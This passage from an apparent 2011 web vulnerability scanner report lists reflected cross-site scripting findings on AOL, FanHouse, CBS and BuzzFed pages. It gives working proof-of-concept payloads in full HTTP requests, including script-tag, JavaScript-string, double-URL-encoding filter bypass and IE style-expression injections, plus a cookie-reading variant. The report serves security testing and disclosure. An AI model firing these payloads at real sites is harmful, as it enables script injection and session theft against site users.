Keep-Alive: timeout=5, max=999980
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 65475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/?15cf3"><script>alert(1)</script>4e8bf31abab=1" />
...[SNIP]...

1.174. http://news.travel.aol.com/explore-america/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /explore-america/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc0f9"><script>alert(1)</script>d8df1da81dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /explore-america/?fc0f9"><script>alert(1)</script>d8df1da81dc=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:47 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999929
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 52589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="alternate" type=
...[SNIP]...
<link rel="canonical" href="http://news.travel.aol.com/explore-america/?fc0f9"><script>alert(1)</script>d8df1da81dc=1" />
...[SNIP]...

1.175. http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /hotel/inside-the-royalton-in-new-york-city/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82562"><script>alert(1)</script>fa0b25a6bcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/inside-the-royalton-in-new-york-city/?82562"><script>alert(1)</script>fa0b25a6bcf=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:52 GMT; path=/
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 75825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/?82562"><script>alert(1)</script>fa0b25a6bcf=1" />
...[SNIP]...

1.176. http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /hotel/los-angeles-hotels-near-lax/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9529f"><script>alert(1)</script>db864afbfc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/los-angeles-hotels-near-lax/?9529f"><script>alert(1)</script>db864afbfc3=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:51 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:50 GMT; path=/
Keep-Alive: timeout=5, max=999977
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 76721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/?9529f"><script>alert(1)</script>db864afbfc3=1" />
...[SNIP]...

1.177. http://nfl.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9200f"-alert(1)-"9027b25266b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9200f"-alert(1)-"9027b25266b=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:55 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 111277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
,fanhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NFL";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://nfl.fanhouse.com/?9200f"-alert(1)-"9027b25266b=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.178. http://nfl.fanhouse.com/superbowl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /superbowl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fdd"><script>alert(1)</script>96eb04b239 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /superbowlf1fdd"><script>alert(1)</script>96eb04b239 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:57 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999782
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 25671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://nfl.fanhouse.com/superbowlf1fdd"><script>alert(1)</script>96eb04b239"/>
...[SNIP]...

1.179. http://nfl.fanhouse.com/superbowl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /superbowl

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8568c"-alert(1)-"007a301d86a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /superbowl8568c"-alert(1)-"007a301d86a HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:58 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999759
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 25643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NFL";
s_265.prop2="error";
s_265.prop9="";
s_265.prop12="http://nfl.fanhouse.com/superbowl8568c"-alert(1)-"007a301d86a";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.180. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /superbowl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2724f"><script>alert(1)</script>d81db27d9b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /superbowl?2724f"><script>alert(1)</script>d81db27d9b5=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999997
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
<link rel="canonical" href="http://nfl.fanhouse.com/superbowl?2724f"><script>alert(1)</script>d81db27d9b5=1"/>
...[SNIP]...

1.181. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nfl.fanhouse.com
Path:   /superbowl

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0873"-alert(1)-"cfe39284596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /superbowl?e0873"-alert(1)-"cfe39284596=1 HTTP/1.1
Host: nfl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
mafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NFL";
s_265.prop2="super-bowl";
s_265.prop9="";
s_265.prop12="http://nfl.fanhouse.com/superbowl?e0873"-alert(1)-"cfe39284596=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.182. http://nhl.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nhl.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d0e"-alert(1)-"693917f6b35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?79d0e"-alert(1)-"693917f6b35=1 HTTP/1.1
Host: nhl.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:53 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999796
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 78175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
,fanhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NHL";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://nhl.fanhouse.com/?79d0e"-alert(1)-"693917f6b35=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.183. http://noticias.aol.com/category/latino-news/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://noticias.aol.com
Path:   /category/latino-news/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8256c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17094e0f3fe was submitted in the REST URL parameter 2. This input was echoed as 8256c</script><script>alert(1)</script>17094e0f3fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /category/latino-news8256c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17094e0f3fe/ HTTP/1.1
Host: noticias.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:24:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999895
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 32777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
       <title>Posts from the L
...[SNIP]...
<!--
function runOmni()
{
s_265.pfxID="ltn";
s_265.pageName="" + " | " + "Latino News8256c</script><script>alert(1)</script>17094e0f3fe";
s_265.server="";
s_265.channel="us.latnot";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,noticias.aol.com";
s_265.prop1="";
s_265.prop2="Latino News8
...[SNIP]...

1.184. http://ocp.cbs.com/pacific/Response.jsp [c parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ocp.cbs.com
Path:   /pacific/Response.jsp

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 93d1a<a>32b91cfbcdc was submitted in the c parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /pacific/Response.jsp?id=1296756969&c=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/2/0/%2a/w%3B235146685%3B0-0%3B17%3B59749070%3B780-320/240%3B40398809/40416596/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f93d1a<a>32b91cfbcdc&h=http://s0.2mdn.net&n=148748&i=http://ad.doubleclick.net/imp;v7;/;235146685;0-0;17;59749070;320/240;40398809/40416596/1;;~aopt=2/0/ff/0;~okv=;site=entertainment;dpart=primetime;show=bigbangtheory;feat=full_episodes;feat=rebroadcast;partner=cbs;vid=1777408650;outlet=CBS%20Production;pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y;noAd=;type=ros;format=MPEG4;pos=2;sz=320x240;playerVersion=UVP2.7.1;adv=b;bc=true;slot=a;aseg=;bsg=102083;bsg=102208;bsg=105374;;~cs=h%3f&partner=cbs HTTP/1.1
Host: ocp.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/thunder/canplayer/canplayer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3CE38FFF124B5D96C3F299A61073C266; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404; CBS_ADV_VAL=b%3Bbc%3Dtrue; MADUCAT=1&0206&BK16187&BK16193&BK16567&BK16198&BK14860; mad_rsi_segs=; XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; playerVersion=UVP2.7.1; _PACIFIC_COMMENTS=Ad+System+Call%28ocp.cbs.com%29%3A+http%3A%2F%2Fad.doubleclick.net%2Fad%2Fcan%2Fcbs%2Fp8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3Bsite%3Dentertainment%3Bdpart%3Dprimetime%3Bshow%3Dbigbangtheory%3Bfeat%3Dfull_episodes%3Bfeat%3Drebroadcast%3Bpartner%3Dcbs%3Bvid%3D1777408650%3Boutlet%3DCBS%2520Production%3Bpid%3D8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3BnoAd%3D%3Btype%3Dros%3Bformat%3DMPEG4%3Bpos%3D2%3Bsz%3D320x240%3BplayerVersion%3DUVP2.7.1%3Badv%3Db%3Bbc%3Dtrue%3Bslot%3Da%3Baseg%3D%3Bord%3D807811%3F; ad_format=MPEG4; PACIFIC_TRACE=c17-ad-xw9.cnet.com.12970246081810.6793216811445366; CBS_MIDROLL_SLOT=2.a; pos=2; PACIFIC_AD_CALL=%2Fvideos.can.com%2Fcbs%2F%2Fent%2Fpt%2Fbbt%2Ffe%2Frb%3Bsite%3Dentertainment%3Bdpart%3Dprimetime%3Bshow%3Dbigbangtheory%3Bfeat%3Dfull_episodes%3Bfeat%3Drebroadcast%3Bpartner%3Dcbs%3Bvid%3D1777408650%3Boutlet%3DCBS+Production%3Bpid%3D8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3BnoAd%3D%3Btype%3Dros%3Bformat%3DMPEG4%3Bpos%3D2%3Bsz%3D320x240%3Bord%3D807811%3BplayerVersion%3DUVP2.7.1; xml=vast2; partner=cbs

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:38:18 GMT
Server: Apache-Coyote/1.1
Content-Type: application/xml;charset=ISO-8859-1
Content-Length: 3500
Set-Cookie: JSESSIONID=9CEB649DE56A4E555E5BA5308E6F85B8; Path=/pacific
Set-Cookie: CBS_CAT_EXCL=2%3A; Domain=.cbs.com; Path=/
Set-Cookie: exclude=cat%3Dfinancial; Domain=.cbs.com; Path=/
Set-Cookie: xml=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: partner=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pos=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ad_format=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sz=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: playerVersion=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: PACIFIC_COMMENTS=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: PACIFIC_AD_CALL=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<VAST version="2.0">
<Ad id="1296756969">
<InLine>
<AdSystem>DART</AdSystem>
<AdTitle>235146685_BAC_AST_QBKW
...[SNIP]...
<ClickThrough>http://ad.doubleclick.net/click;h=v8/3aa6/2/0/*/w;235146685;0-0;17;59749070;780-320/240;40398809/40416596/1;;~aopt=2/0/ff/0;~sscs=?93d1a<a>32b91cfbcdchttp://ad.doubleclick.net/clk;235299720;59096477;z</ClickThrough>
...[SNIP]...

1.185. http://pglb.buzzfed.com/12659/989cc9ecbfd3d382e27b06d49f58dc6f [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /12659/989cc9ecbfd3d382e27b06d49f58dc6f

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 14885<script>alert(1)</script>c21e4d75bd1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12659/989cc9ecbfd3d382e27b06d49f58dc6f?callback=BF_PARTNER.gate_response14885<script>alert(1)</script>c21e4d75bd1&cb=3913 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604794
Expires: Sun, 13 Feb 2011 20:54:34 GMT
Date: Sun, 06 Feb 2011 20:54:40 GMT
Connection: close

BF_PARTNER.gate_response14885<script>alert(1)</script>c21e4d75bd1(1242086400);

1.186. http://portal.pf.aol.com/jsonmfus/ws [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.pf.aol.com
Path:   /jsonmfus/ws

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6dc58<script>alert(1)</script>2112900b8a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonmfus/ws?service=symslist,markets&symbols=E:DJI:$INDU,E:NAI:$COMPX,E:CMI:$INX,E:BSS:(TC10Y,E:ISE:UKX,E:FX1:N225,E:FX1:HSIX,E:FX1:EURUSD,E:FX1:USDJPY,E:DEI:DAX,E:FX1:GBPUSD,E:FX1:USDCHF,E:CMX:/GC\J11,E:NYM:/CL\H11,E:NYM:/PL\J11,E:NYM:/NG\J11,E:NYS:C,E:NYS:BAC,E:NYS:SPY,E:NYS:S,E:NYS:KV.A,E:NYS:KV.B,E:NYS:NPTN,E:NYS:EEE,E:NYS:CPX,E:NYS:DQ,E:NYS:GMXR,E:NYS:LVS&porttype=2&portmax=100&callback=rebuildLiveHash6dc58<script>alert(1)</script>2112900b8a8&rf=http://www.dailyfinance.com HTTP/1.1
Host: portal.pf.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021680436-New%7C1360093680436%3B%20s_nrgvo%3DNew%7C1360093680440%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:47:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate, no-transform
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=utf-8
Content-Length: 16235

rebuildLiveHash6dc58<script>alert(1)</script>2112900b8a8({"ResultSet": {
"symslist": [
{
"lu": "http://www.dailyfinance.com/quotes/dow-jones-industrial-average/%24indu/dji",
"c": "+29.89",
"xdn": "DJ Index",
"p": "12,092.15",
"pc": "+0.25"
...[SNIP]...

1.187. http://realestate.aol.com/blog/2011/02/04/million-dollar-home-defaults-just-what-the-doctor-ordered/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.aol.com
Path:   /blog/2011/02/04/million-dollar-home-defaults-just-what-the-doctor-ordered/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf12"style%3d"x%3aexpression(alert(1))"c3cb16c7ff was submitted in the REST URL parameter 4. This input was echoed as eaf12"style="x:expression(alert(1))"c3cb16c7ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /blog/2011/02/04eaf12"style%3d"x%3aexpression(alert(1))"c3cb16c7ff/million-dollar-home-defaults-just-what-the-doctor-ordered/ HTTP/1.1
Host: realestate.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:12:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:12:04 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 63524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--PLUGIN NOTICE: Cache miss or caching is disabled. Parameters Array
(

...[SNIP]...
<input type="hidden" name="referer" value="http://realestate.aol.com:1080/blog/2011/02/04eaf12"style="x:expression(alert(1))"c3cb16c7ff/million-dollar-home-defaults-just-what-the-doctor-ordered/">
...[SNIP]...

1.188. http://realestate.aol.com/blog/2011/02/04/worst-foreclosed-home-vandalism-ever/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://realestate.aol.com
